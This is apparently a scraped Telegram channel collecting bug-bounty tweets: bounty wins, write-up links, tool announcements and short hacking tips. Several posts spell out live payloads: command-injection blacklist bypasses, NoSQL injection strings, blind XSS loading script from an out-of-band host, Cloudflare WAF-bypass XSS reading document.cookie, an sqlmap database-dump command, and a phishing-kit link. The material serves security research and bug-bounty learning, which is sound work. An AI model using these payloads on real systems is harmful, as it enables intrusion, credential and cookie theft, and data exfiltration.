Bug Hunting Hub
760 subscribers
9 photos
268 links
The source of insights for Bug Hunters. The channel is driven by bot, curated by twitter.com/makrushind
instagram.com/makrush.in
Download Telegram
to view and join the conversation
#BugBountyTips of the Day
Yesterday found two DOM XSS with the help of DOM Invader. Thank you @PortSwigger for making this amazing extension 😍🔥 Tip: Use DOM Invader for finding DOM XSS manually. #burptips #bugbountytips https://t.co/ma4PScAffj
---
Been learned for ~2 weeks, this is my first #Rust program: a fast tool to scan prototype pollution vulnerability. https://t.co/9fqxPYpUSF Thanks to @R0X4R for the tip! #infosec #bugbounty #bugbountytips
---
#XSS filter evasion cheat sheet <3 If anyone can turn this into a graphic, feel free to :) <3 i am not an artist x) #BugBounty #infosec #hacking https://t.co/5ZRgU0fhKE
---
Command Injection(Bypass Blacklisted words) Bypass with single quote w'h'o'am'i Bypass with double quote w"h"o"am"i Bypass with backslash and slash w\ho\am\i /\b\i\n/////s\h Bypass with $@ who$@ami #bugbounty #bugbountytips #bugbountytip
---
Laravel phpunit RCE. #bugbountytips #rce #laravel https://t.co/0PmnqEbFfu
#BugBountyTips of the Day
#Repost 3. Let’s Bypass CSRF Protection & Password Confirmation to Takeover Victim Accounts Blog: https://t.co/JBFSI3ZHv9 #appsec #infosec #webappsec #hacking #bugbounty #bugbountytips #Repost
---
Facebook Bug bounty 🤞 #bugbounty #infosec https://t.co/N9bhnWXzzi
---
Payloads for NoSQL Injection true, $where: '1 == 1' , $where: '1 == 1' $where: '1 == 1' ', $where: '1 == 1 1, $where: '1 == 1' { $ne: 1 } ', $or: [ {}, { 'a':'a ' } ], $comment:'successful MongoDB injection' db.injection.insert({success:1}); #bugbounty #bugbountytips
---
Always check "unsubscribe" option at the bottom of email. sometimes this will give you un-authorized access to victims email settings. The url format [not always] will be like : https://target/unsubscribe/Subscription.aspx?email=<victims_email> #bugbounty #bugbountytips https://t.co/NnB01xDFSI
---
Hello! I created a small repository related to Android Security. Repository contains notes, writeups, reports, good reads and lot more things. Gradually, I will update more resources and notes there. Checkout : https://t.co/fqxULjSBl9 #AndroidSecurity #BugBounty #Hacking
---
#bugbountytips I made the Part 2 on Prototype Pollution Series https://t.co/S7l5ySns9G Soon, there more blog posts on same in detail I need your support friends. Thanks @debangshu_kundu @KathanP19 @iamsarvagyaa @WHOISbinit @huntrdev
#BugBountyTips of the Day
Since my first day of joining on @Hacker0x01 @jobertabma I’ve submitted many reports to Hackerone and end result is always a Dup/informative. I didn’t give up and today I got my first valid find on Hackerone 🧡 This hits different #bugbounty #nevergiveup https://t.co/LwKrTHRuaG
---
Infosec Entry level Interview Questions 101 📜🏆 PS: These are the list of questions I have come across and questions faced by my students in their interviews. Feel free to add more below 👇 1. What is your fav OWASP Top 10 bug 2. Explain your methodology? #infosec #bugbounty
---
Add a SSTI payload to your Blind XSS payload, if you are lucky, you have a visual internal SSTI in a critical endpoint. ${{48*53}}`'";--><sCRIpt sRc=//your.oob></sCRIpt> #BugBountyTips #BugBounty
---
Email verification bypass 1.create your account 2. open burp suite, intercept on for request to response 3.enter any code and click verify 4.change 403 un.--->200 OK err--->success invail code--->vaild code #bugbountytips
---
If anyone would like to join @SynackRedTeam and have questions around Onboarding Process. Join me , Kelsey and @rfkrishnan today 9:00 PM IST on clubhouse to discuss the same , RSVP: ( https://t.co/TbJSGMTNHQ) #BugBounty #infosec #Pentesting
---
Disponible el video del Webinar Gratuito: "Análisis Forense a IIS". #hacking #cybersecurity #bugbounty #osint #forensicshttps://t.co/JZtYKud1ta https://t.co/TXJryr4YgP
#BugBountyTips of the Day
I Earned $12,000 for my Submission. Bug Type: Blind SQL Injection. #bugbounty #bugcrowd #infosec #security #bountyhunter https://t.co/jPZlxlgHtf
---
Blogged about another topic from @null0x00 study group! Covering #OAuth basics and vulnerabilities around it. https://t.co/H0GAKEa1bT #infosec #bugbountytips #bugbounty
---
Bypassing Payment Process:) Somewhere from Internet. #bugbountytips https://t.co/LBP043RJd1
#BugBountyTips of the Day
Cerbrutus - (SSH Bruteforcing) - Much faster & reliable than any other existing solutions. We've tested it against Hydra with over a 200% speed improvement. (SMB, FTP, HTTP, coming soon!) - Repo: https://t.co/592a0vNnYb - #CyberSecurity #CTF #BugBounty #bugbountytips #infosec https://t.co/WPF5WwzKb5
---
-Tip 8/31- #bugbountytips White-box Pentst? Learn the dangerous functions of the tested language. Java: https://t.co/9VmPu5HZWI .NET: https://t.co/sFHeKFPVKQ PHP: https://t.co/pnIqHzSTmj Ruby: https://t.co/KcLNVs5Byj (Or simply Google: [language] + security best practices)
---
Advanced SQL Injection in Oracle databases #infosec #pentest #redteam #bugbounty https://t.co/8QAXb4moGd https://t.co/61tyLCw8Zq
---
I have decided to write on Medium after a long time, so please share your thoughts and criticisms.🔥, I hope you enjoy it.😃 Params — Discovering Hidden Treasure in WebApps https://t.co/HgyyYjcusx #bugbounty #bugbountytips #bugbountytip
#BugBountyTips of the Day
Received $25K Bounty 🥳 #bugbounty #infosec #cybersecurity https://t.co/fToMOj8gVE
---
1 - Found an ATO that required knowing the victim's UUID 2 - Couldn't find a way to get the UUID 3 - Saw that @Yassineaboukir was also in the program 4 - Asked Yassine if he knew how to get the UUID 5 - He found a way to get the UUID 6 - Full ATO #togetherwehitharder #bugbounty
---
Account Takeovers — Believe the Unbelievable by @niksthehacker https://t.co/sRDcXJoGBo #bugbounty #infosec #hacking
---
I just published Account Takeovers  - Believe the Unbelievable https://t.co/R3pLG8TKyr #bugbounty #Pentesting #bugbountywriteups #bugbountytips
---
Back in Bug bounties 2 days , 2 SQL injections -Error Based -Blind boolean based. Takeaway : Tamper every parameter in every request. #bugbounty #bugbountytip #bugbountytips #HackThePlanet
---
When hunt on @Bugcrowd after 1 month ( currently busy in clg stuff ) & hit some P1's in a row I'm still worthy :) #bugbountytip 1st- Check for signup endpoint in grafana , sometimes Dev's forget to hide 2nd - Never forget to fuzz subdomains , you may access docker credentials https://t.co/0gjSdStjNQ
#BugBountyTips of the Day
Have a nice weekend everyone! 🏞️🗻👏🎂🎂🏍️💫💖 #bugbounty #infosec https://t.co/Bax1rfXdIn
---
Two sensitive files that you can add to your automation while fuzzing Wordpress based websites: /wp-config.php.bak --> A lot of leaked info including database credentials. /wp-content/debug.log --> All PHP related debug data. #bugbountytips #Hacking #infosec
---
Don't give up too fast if all your standard XXE payloads don't work 😭@nullenc0de has you covered with another way to extract juicy information! 😎#bugbountytips https://t.co/Q2DgMXQHhd
---
Got a S3 bucket but don't know who is the owner ?? Use the below command to check the bucket owner aws s3api get-bucket-acl --bucket bucket-name #bugbountytip #bugbountytips #infosec #AWS
#BugBountyTips of the Day
Labs for Web application Pentesting Practice SQLi- https://t.co/DV8ANQHob5 Oauth 2.0- https://t.co/lNOV55WJFU GraphQL- https://t.co/N5i1ZA4oN2 JWT Authentication- https://t.co/6ZbeTcoXqp SAML Authentication- https://t.co/0omfjMRNzV XSS- https://t.co/MSfR76JWjO #bugbounty
---
(PhishMailer - Create Professional Phishing Emails Fast And Easy) - https://t.co/LCjXqQQREs #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/lc6TrfSOa5
---
What happens when you use 100% of your brain? Thanks developer for putting the password reset OTP right there! Crazy bugs hunting with @MAALP1225 #bugbounty https://t.co/biA3JVd2z1
#BugBountyTips of the Day
Yay, I was awarded a $10,330 bounty on @Hacker0x01! #TogetherWeHitHarder #BugBounty #bugbountytips YESSSSSSSSSSSSSSSSSS LETS GOO 🙏🙏💸💸💎💎
---
A Pentester’s Guide to Server Side Request Forgery (SSRF) https://t.co/chxMHbuoLn #bugbounty #infosec #hacking
---
Go to your android/ios device setting and change the device name to ur BXSS payload like "><script/src=//gujju.xss.ht>//" and enable 2FA for all applications using Authenticator/authy/okta. you might end up with blind XSS for the internal admin panel. #bugbounty #bugbountytips
---
Inspired By @ADITYASHENDE17 Slides That Called Abusing Functions For #bugbounty I Have Been Collecting A Lot Of Log In Tips , So Here Is My Log In Checklist With All Resources Links https://t.co/1rHrRIBsFO If You Have Any Question , DM Me . https://t.co/laYjOtCjfh
---
Hey all! A quick AEM #bugbountytip for you guys! Appending the query "?tidy=true" to the JSON output of any endpoint prettifies it for you. (Check pics 1&2) Also, certain times it might help you to break the caching behaviour of AEMs too! Have fun with this. (Pic 1/2) https://t.co/f7gioG7KMf
#BugBountyTips of the Day
Alhamdulillah I earned $1,750 for my submission on @bugcrowd #ItTakesACrowd #Love to pwn Api function #Api endpoint bypass #bugbounty https://t.co/77BvCGQGmT
---
Achieved 1k+ REPUTATION points by doing manual hunting & sticking to single program for nearly 3 months (40+)/60 issues got TRIAGED As @zseano always says, "Spend months on same program with the intentions of deep dives" Thanks @zseano for those words #bugbounty #bugbountytip https://t.co/q47o7Kk0S4
---
Hey Hackers 👋 I have created a small script to automate the workflow mentioned in https://t.co/gGpYssmwIv by @m4ll0k I would love to hear some suggestions to the tools name #bugbounty #hackerone #bugcrowd N.B: Some of his tools used in the gist are still private
---
I just published Broken Access control bug : Bypassing 403’s by finding another endpoint that do the same thing. https://t.co/vtmSd9vcsF #bugbountytips #infosec
#BugBountyTips of the Day
Oh my god, this is one of the best days in my life :D, finally, after 3 months (For God's sake Microsoft), it's finally here, I'm honored to say working with the MSRC team for over 3 years been my golden moments Thank you, God <3 Thank you, MSRC <3 #bugbounty #cybersecurity https://t.co/4YWG5tu8xe
---
Yay, I was awarded a $7,000 bounty on @Hacker0x01 ! https://t.co/MuYgWXpUZP #TogetherWeHitHarder It was a Web Cache Poisoning vulnerability within one of the private HackerOne program. Explore @albinowax portswigger's research to dive deeper. #HackerOne #Bugcrowd #BugBounty https://t.co/QeZxrVkdzw
---
Yesterday, hoped on a call with friends and an organization's team members to clarify bugs. The team member started laughing when my friends talked because of their English accent. I think that this attitude and behavior has no space in #Bugbounty or #infosec world. I'm ashamed.
---
It was a nice vacation. #BugBounty changed my life. Thanks all bug bounty platforms, especially @Hacker0x01 and @intigriti https://t.co/V5nyCnOomR
---
Inspired By @ADITYASHENDE17 Slides That Called 2FA Bypassing For #bugbounty I Have Been Collecting A Lot Of 2FA Bypassing Tips , So Here Is My 2FA Bypassing Checklist With All Resources Links https://t.co/J00a2wr7dF If You Have Any Question , DM Me . https://t.co/psnq2Dn7ys
---
#Security_Workbook_on_Pentesting Update Changed the domain from https://t.co/uVbzmFBDhT -> https://t.co/b0sMe3qILM Thanks to all the contributors, it is because of them what it is today, @chaskar_shubham @Sunil45_ @sonumohapatra92 @M0hn1sh @u1tran00b @aakhadse29 #bugbountytips
---
Yay, I was awarded a $1,000 bounty on @Hacker0x01! Bug: Response Manipulation allowed to access Admin Panel example changing type:user to type:admin made me temporary admin for session #TogetherWeHitHarder #BugBounty
#BugBountyTips of the Day
Improper access control edge case. /admin/index.jsp --> 403 /;/admin/index.jsp --> 200 #bugbounty #bugbountytips #hackerone #infosec #ethicalhacking #infosec #whitehat
---
Awesome articles on Shodan, Github and Google Dorking By @securitytrails might help you in Bug Hunting, give them a read. Shodan:- https://t.co/DmEDyioiiB Github:- https://t.co/oQ7NmjZwOe Google:- https://t.co/dFpwAOTh3C #bugbountytips #infosec
---
We are planning to add full XSS scan section in @PrettyRecon . Features include. 1. Single target xss scan. 2. All target xss scan (source of urls from web archive) 3. Parameter finding tool. 4. DOM xss scanner. 5. Prototype pollution xss finder. 6. Web crawler. #bugbounty #recon
---
YApi RCE 🔥 POC: https://t.co/6GVzg3ic0Y #bugbountytips #RCE #YApi https://t.co/yHsheIaR1g
---
Disponible el video del Webinar Gratuito: "Capturar Tráfico de Red". #hacking #cybersecurity #bugbounty #osint #forensicshttps://t.co/Zff0ix4Unn https://t.co/5cstKKN8Nx
#BugBountyTips of the Day
I've been on both the @hackerone program side and the #bugbounty hunter side of frustrating CVSS discussions, so I gave some thought into what I think is the root of many of the frustrations, and how they might be circumvented. Read my thoughts here: https://t.co/acHAWvtF05
---
I’ll be posting code and a video later today showing you how to hunt for vulnerabilities inside android apks. #bugbountytips #mobilehacking #bugbounty #ShareKnowledge
---
Decided to create "BountyTricks" a repo with private modules and bounty related tricks I'll add from time to time, starting with fresh nuclei SSRF module which takes endpoints as input and check's if they are vulnerable to SSRF - in scale https://t.co/HudBCDBoqj #bugbountytips
---
Hacking is all about being creative! @inhibitor181 is once again showing that to us with this week's #bugbountytip! Sometimes, changing the "Content-Type:" can do wonders 💥 https://t.co/WjLMNuqCOj
---
I’ve had many requests for classes, training and mentoring, I will be starting FREE #hacking and #bounty courses in about a month and I will let everyone know how to join. No BS, No Cost. Teaching Mobile, Web, Network, Cloud, Hardware #hacks #shareknowledge #bugbounty #hackers
---
Some easy bugbounty tips for beginners #bugbountytips #bugbounty
---
Finally after lots of hard-work, managed to get CROSS-TENANT issues Tip: 1. User1 can send invitation to new Users on Org1 2. User1 change org_id from Org1 to Org2 3. Invitation gets sent as Org2 context on new User email #bugbounty #bugbountytip #bugbountytips https://t.co/7NYlEHM0Rm
#BugBountyTips of the Day
Collection of SQL injection write-ups. thanks to all researchers for sharing there research. https://t.co/kR0NrDyCUL https://t.co/aSIPH8PTH1 https://t.co/yY6P4xOS1V https://t.co/QXPQGjA0ji https://t.co/4PGNVvVzDD #bugbountytips #bugbountytip #SQLi #mah3Sec_ #cybersecurity (1/3) https://t.co/6HZlzyopSw
---
New #byp4xx in python: - Amount of lines reduced from ~350 to ~150 - Accepts ANY cURL option - More HTTP verbs - New module with 2454 UAs from SecList Waiting for your feedback, recommendations... ^u^ #bugbountytips #infosec https://t.co/bw6DXj5Vtw
---
people who crying for #bugbounty course, mentors, hacking classes this is all what you need https://t.co/1vqacXTEds https://t.co/NoSci50zyw https://t.co/GNwyebSB2M https://t.co/wn2gZ4pgEn The problem is you guys will never complete those trainings at all 💔
Who’s Security Champion? You’re the Champion!

To properly implement a product maturity program, organizations need to embed and grow security expertise. Cultivation of application security champions requires the right pivot point in the following topic: application bug hunting and mitigation strategy.

This training is designed to be useful both from the perspective of a learner who starts a bug hunting journey on his weekend, as well as software engineers who want to dig deeper into the AppSec automation during software development lifecycle. Get on board!

https://makrushin.com/hitb2021/
#BugBountyTips of the Day
MANSPIDER - Spider Entire Networks For Juicy Files Sitting On SMB Shares. Search Filenames Or File Content - Regex Supported! https://t.co/ffajymTLGw #cybersecurity #bugbountytips #hacking #tools https://t.co/RUUdiBHyJA
---
cool bounty receive today For simple and easy RCE on @Facebook write up will be in the coming 2 days #bugbountytip today [Every thing simple in these life] #bugbounty #facebook https://t.co/sodEZfV1qj
---
Saved A*s of a company from following data leak trend😂 2 billion users PII leaked through endpoint (contains banking details too) #databreach #securitybreach #bugbounty #hacking #dataleakage #bugbountytips #bugbountytip @sechunt3r @ADITYASHENDE17 @sratarun https://t.co/3F9MSN1Y61
---
€150 reward Tips: 1. https://t.co/Z1i0OuDc1s use the AEM 2. I use this tool https://t.co/51L0gVX3bW 3. python3 https://t.co/biH3gLSDrV https://t.co/a5C8ygXmhu 4. found the https://t.co/NgBKtykZ32 5. Boom! , information #BugBountyTip #BugGounty https://t.co/vj2KSACLei
---
#bugbountytip #bugbountytips Check for these keywords in WayBackURL: password, secret, token, access, pwd, api, .json, = http, =%2F, =/, email=, @, ey, .txt, aws, admin, .js, config, dashboard, oauth Also search for these same keywords in source code.
#BugBountyTips of the Day
Some #hackers REFUSE tell you how to make $50, or $100 for low #vulnerabilities, but I WILL #teach and show how to submit those low #bugs and how to #makemoney on a #bugbounty program for FREE. Submitting low #bugs cleans the web!!! Class signup starts tomorrow #shareknowledge https://t.co/kYYIMIPWdU
---
Forgot to announce that I have joined the @detectify crowdsource platform and will be helping submit vulnerabilities to help secure their customers! #bugbounty #crowdsource
---
Request + Response + Matcher = Nuclei Template ♥️ Detailed blog about writing your Own Nuclei Template! https://t.co/RRJgpULslA #nuclei #bugbountytips #hackwithautomation #bugbounty @pdiscoveryio
---
Bypass Cloudflare for XSS! payload :javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie thanks @HoseinVita #bugbountytips
---
I tried harder 😈 #bugbounty #infosec https://t.co/3ni8Oy8k6e
---
🚨🚨 Hackers and beginners guide to Docker Containers is finally here. Link : https://t.co/IssSuNmrtP A big thanks to awesome reviewers: @ianmiell @aurelievache @sanjogpanda @m4giktrick @KathanP19 @i_shivamsoni #infosec #security #cybersecurity #hackers #containers #bugbounty
---
When js file says not found, add .download after .js , maybe you can access that .js file #bugbountytip #bugbounty https://t.co/GkmrR0i1q4
---
New Write-up: How I bypassed a tough WAF to steal user cookies using XSS and how it ends with N/A! I have made an XSS Lab that simulat the restrictions I met in this application, you can give it a try! https://t.co/k3vj2CLkF9 #bugbounty #bugbountytips https://t.co/YD2sHAKayF
#BugBountyTips of the Day
CloudFlare WAF ByPass HaHaHa Nice :) Attack: XSS Payload: test",prompt%0A/*HelloWorld*/(document.domain) Example: https://t.co/tKS0EyAoPL #BugBounty #bugbountytips #wafbypass #cloudflare https://t.co/P7xe5Kay4R
---
#bugbountytips This is an AMAZING resource, a list with bug bounty tools. Honestly the best i found so far, do you have a better list? https://t.co/uswaWJmFqY
---
In these blessed days Some one give a vary vary Bad and critical Report to @Facebook 😎 today I was able to access & full control on about 12 servers and lot of etc… For Facebook 😍 Write up will be tomorrow for all the bug that I send to Facebook Happy Eid ❤️ #bugbounty https://t.co/45Uzo39FSj
---
Sign up for Hacking Classes now FREE!!! The First Class "HACKING RECON" starts August 4th, 2021 - 9:00am CST A live link to watch the class will be posted in the classroom and on Twitter every day before classes. #BugBounty #ShareKnowledge #giveback https://t.co/EGTboDopVu
---
Once again 😈 #bugbounty #infosec #cybersecurity #CyberSecurityN8 https://t.co/e47xUPPBuz
---
Bypass WAF and dump current databases :) !! Command : https://t.co/3z8lSkvu8A -r request.txt -p “value” -v 3 — level=5 — risk=3 — time-sec=15 — tamper=between — current-db — no-cast Credit : Pls Mention ... #bugbountytips #secnhack #hackerone #cybersecurity #infosec #bugcrowd https://t.co/ffEQK1gkMm
#BugBountyTips of the Day
(DARKARMY - Collection Of Penetration Testing Tools, Every Hacker Needs) - https://t.co/4yt3lLfwzi #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/fbmsCbTdGm
---
I just published How I Found Multiple Bugs On FaceBook In 1 Month And a Part For My Methodology & Tools @XHackerx007 @aditi_singghh @waseyuddin @snewbill @Farah_Hawaa @sillydadddy @Alra3ees https://t.co/IG26AB3zN9 #bugbounty #bugbountytips #bugbountytip
---
If you are currently using Kali Linux that is fine for the upcoming class, we will be using Terminal for this entire class. We will not be using GUI's at all in this class. I want to teach you how to do #bugbounty recon without 3rd party tools.